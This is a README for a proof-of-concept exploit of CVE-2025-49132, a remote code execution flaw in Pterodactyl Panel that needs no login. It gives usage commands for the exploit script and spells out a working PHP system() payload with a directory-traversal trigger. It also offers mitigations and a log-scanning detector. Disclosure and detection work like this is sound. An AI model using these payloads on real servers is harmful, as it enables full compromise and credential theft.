CVE-2025-49132 Pterodactyl Panel - Unauthenticated Remote Code Execution (RCE)
PoC exploit for CVE-2025-49132 (GHSA-24wv-6c99-f843) – Unauthenticated Remote Code Execution in Pterodactyl Panel ≤ 1.11.10
🔎 Summary
CVE-2025-49132 is a critical Remote Code Execution vulnerability affecting Pterodactyl Panel <= 1.11.10.
An unauthenticated attacker can exploit improper input validation in the /locales/locale.json endpoint to execute arbitrary system commands.
Patched in version: 1.11.11
📌 Impact
Successful exploitation allows:
- Unauthenticated Remote Code Execution
- Reading sensitive files (e.g., .env)
- Database credential extraction
- Full server compromise
Severity: Critical
🧠 Root Cause
The vulnerability exists due to improper validation of:
- locale parameter
- namespace parameter
An attacker can:
- Abuse directory traversal (../../../../../)
- Leverage config-create
- Write arbitrary PHP payloads to /tmp
- Trigger execution via crafted namespace loading
Weakness Classification: CWE-94 – Improper Control of Generation of Code ('Code Injection')
🚀 Proof of Concept (PoC)
Usage
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
Examples
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
Default path:
/usr/share/php/PEAR
Get the correct PEAR path from the /phpinfo.php page.

🛠 Exploitation Flow
Step 1 - Write Payload
The attacker injects a malicious PHP payload into /tmp/payload.php using:
/<?=system('id')?>+/tmp/payload.php
Step 2 - Trigger Execution
By calling:
?locale=../../../../../tmp&namespace=payload
The server executes the injected PHP.
🛡 Mitigation
- Upgrade to Pterodactyl Panel >= 1.11.11
- Sanitize locale and namespace inputs
- Disable dangerous PHP functions
- Restrict unnecessary endpoint exposure
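Until the upgrade is in place, the request pattern in the Exploitation Flow above is easy to hunt for in web-server access logs. The following detector is an added example (not part of this PoC or the Pterodactyl project): it flags requests to /locales/locale.json whose locale or namespace values contain traversal sequences or fall outside an assumed allow-list format; the log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed formats for legitimate values; adjust to the locales/namespaces your panel ships.
SAFE_LOCALE = re.compile(r"^[a-z]{2,3}([_-][A-Za-z]{2,4})?$")   # e.g. en, pt_BR
SAFE_NAMESPACE = re.compile(r"^[a-z_]+$")                       # e.g. strings, validation

def is_suspicious_request(request_line: str) -> bool:
    """True if an HTTP request line hits /locales/locale.json with a
    traversal sequence or an unexpected locale/namespace value."""
    try:
        method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return False
    parts = urlsplit(target)
    if not parts.path.endswith("/locales/locale.json"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    for key in ("locale", "namespace"):
        for value in params.get(key, []):
            value = unquote(unquote(value))  # collapse double URL-encoding (%252e%252e)
            if ".." in value or "/" in value or "\\" in value:
                return True
            pattern = SAFE_LOCALE if key == "locale" else SAFE_NAMESPACE
            if not pattern.fullmatch(value):
                return True
    return False

def scan_access_log(lines):
    """Return the combined-log-format lines whose request line is suspicious."""
    hits = []
    for line in lines:
        m = re.search(r'"([A-Z]+ \S+ HTTP/[\d.]+)"', line)
        if m and is_suspicious_request(m.group(1)):
            hits.append(line)
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jul/2025:10:00:01 +0000] "GET /locales/locale.json?locale=en&namespace=strings HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jul/2025:10:00:02 +0000] "GET /locales/locale.json?locale=../../../../../tmp&namespace=payload HTTP/1.1" 200 90',
    '10.0.0.9 - - [01/Jul/2025:10:00:03 +0000] "GET /locales/locale.json?locale=..%252f..%252ftmp&namespace=payload HTTP/1.1" 200 90',
    '10.0.0.7 - - [01/Jul/2025:10:00:04 +0000] "GET /api/client HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("ALERT:", hit)
```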
📚 References
- GitHub Advisory: GHSA-24wv-6c99-f843
- CVE-2025-49132
- Pterodactyl Panel v1.11.11 Patch Commit